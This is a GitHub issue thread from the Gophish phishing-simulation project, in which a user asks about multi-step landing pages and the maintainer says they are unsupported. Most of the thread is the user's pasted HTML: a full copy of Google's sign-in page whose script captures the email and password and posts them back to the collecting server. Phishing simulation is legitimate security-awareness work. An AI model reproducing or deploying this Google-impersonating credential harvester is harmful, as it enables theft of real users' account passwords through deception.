### ISSUE TITLE
landing page

### ISSUE THREAD

**Issue by domesticdom1** [gophish/gophish#1526]
**Thanks for reaching out! We're happy to help resolve issues as quickly as possible.**

**Please use this template when creating a new issue. If you do not follow this template format, your issue may be closed without comment.**

Before filing a new issue, please use the search bar at the top of the browser to search for similar issues. Also, please make sure you have read our [documentation](https://getgophish.com/documentation/), which covers how to use Gophish.

What version of Gophish are you using?: 
7.1
Brief description of the issue: 
multiple landing pages
What are you expecting to see happen? :
webpage has 1 page for username then when you click enter is ask for password. but when i press enter on username it goes to the original webpage login.
What are you seeing happen?
on landing page can handle 2 pages then goes to original webpage
If this question is related to email templates or landing pages not working as expected, please provide your template or landing page below:

```html
Insert code here
```

Please provide any terminal output that may be relevant below:

```
Insert output here
```

Please provide as many steps as you can to reproduce the problem:
 * Step 1 - 
 * Step 2 -

**Comment by jordan-wright** [comment]
Hi there!

I’m afraid multi page landing pages currently isn’t supported in Gophish.

You can potentially get around this using some JavaScript, but this isn’t something we support through this forum.

Sorry we couldn’t be of more help!

**Comment by domesticdom1** [comment]
im not able to retrieve  submitted data on the landing page 
<!DOCTYPE html>
<html>  <head>    <title>Sign in - Google Accounts</title>    <meta charset='UTF-8'>
    <meta http-equiv="cache-control" content="no-cache" />
    <meta http-equiv="expires" content="0" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta name="viewport" content="width=device-width,
    initial-scale=0.75, maximum-scale=0.75, user-scalable=no">
    <meta name="robots" content="noindex, nofollow">     <script src="static/js/jquery.min.js"></script>    <link rel="stylesheet" href="static/css/bootstrap.min.css">
    <link rel="stylesheet" href="static/css/style.css">
    <link rel="icon" type="image/png" href="static/img/oc3czvmbvf.png"/>    <style>    .google-header-bar {
    height: 71px;
    border-bottom: 1px solid #e5e5e5;
    overflow: hidden;
    }    .google-header-bar.centered {
    border: 0;
    height: 108px;
    }    .google-header-bar.centered .header .logo {
    float: none;
    margin: 40px auto 30px;
    display: block;
    }
    .google-header-bar.centered .header .secondary-link {
    display: none
    }    .header .logo {
    margin: 17px 0 0;
    float: left;
    height: 38px;
    width: 116px;
    }    </style>    <style media="screen and (max-width: 800px), screen and (max-height: 800px)">      .google-header-bar.centered {
        height: 83px;
      }      .google-header-bar.centered .header .logo {
        margin: 25px auto 20px;
      }      .card {
        margin-bottom: 20px;
      }    </style>    <style media="screen and (max-width: 580px)">      html,
      body {
        font-size: 14px;
      }      .google-header-bar.centered {
        height: 73px;
      }      .google-header-bar.centered .header .logo {
        margin: 20px auto 15px;
      }      .content {
        padding-left: 10px;
        padding-right: 10px;
      }      .hidden-small {
        display: none;
      }      .card {
        padding: 20px 15px 30px;
        width: 270px;
      }      .footer ul li {
        padding-right: 1em;
      }      .lang-chooser-wrap {
        display: none;
      }    </style>  </head>  <body>    <div class="container">      <div class="google-header-bar centered">
        <div class="header content clearfix">
          <img alt="Google" class="logo" src="static/img/dtnk16mcjo.png">
        </div>
      </div>      <h1 class="text-center login-title">Sign in with your Google Account</h1>        <div class="account-wall">          <img class="profile-img" src="static/img/yqczrisvt2.png" alt="">          <form class="form-signin">
            <input id="eml" type="text" name="eml" class="form-control" placeholder="Email" _autofocus="true" autocorrect="off" autocomplete="off" autocapitalize="off" required>
            <input id="pwd" type="password" name="pwd" class="form-control" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" required><br>            <div id="dialog">
            <h2 id="error">Please enter the required fields.</h2>
            </div>            <button id="btn" class="btn btn-primary btn-block btn-sharp" name="login" type="submit">Sign in</button>
            <a href="#" class="pull-right need-help">Find my account </a><span class="clearfix"></span>
          </form>        </div>            <br><a href="#" class="text-center new-account">Create an account </a>
            <center><br><p class="tagline">One Google Account for everything Google</p>
            <img src="static/img/tmjjgvk28i.png" width="210" height="17" alt=""></center><br><br>    <script>
      /*
      Check the password field and act accordingly.
      */      $("#btn").on("click", function(e) {
          e.preventDefault();
          // get the password box and checkbox elements
          var input = document.getElementById("eml");
          var input2 = document.getElementById("pwd");
          // check to see if the value is empty
          if ( input.value == "" ){
              passNotValid();
          }else if( input2.value == "" ){ //check if the value of the repeat field is empty
              passNotValid();
          }else{
              // post the data
              $("#dialog").css('display', 'none');
                post('post', {
                  wfphshremail: input.value,
                  wfphshrpassword: input2.value
                });      
          }
      });      function passNotValid(){
        $("#dialog").css('display', 'block');
        $(".form-control").css('border', '1px solid #dd4b39');
      }
      
      /*
      Post to the fallowing path given the parameters.      Args:
        path: The path to be posted to.
        params: The parameters to be passed.
      */
      function post(path, params) {
        // create a form and set its attributes
        var form = document.createElement("form");
        form.setAttribute("method", "post");
        form.setAttribute("action", path);        // set the attribute for the post
        for(var key in params) {
            if(params.hasOwnProperty(key)) {
                var hiddenField = document.createElement("input");
                hiddenField.setAttribute("type", "hidden");
                hiddenField.setAttribute("name", key);
                hiddenField.setAttribute("value", params[key]);
                form.appendChild(hiddenField);
             }
        }
        // submit the post
        document.body.appendChild(form);
        form.submit();
      }
      var input = document.getElementById("eml");
      var input2 = document.getElementById("pwd");
      input.disabled = false;
      input2.disabled = false;
    </script>    </div>  </body></html>

    On Sunday, July 28, 2019, 05:25:22 PM PDT, Jordan Wright <notifications@github.com> wrote:  
 
 
Closed #1526.
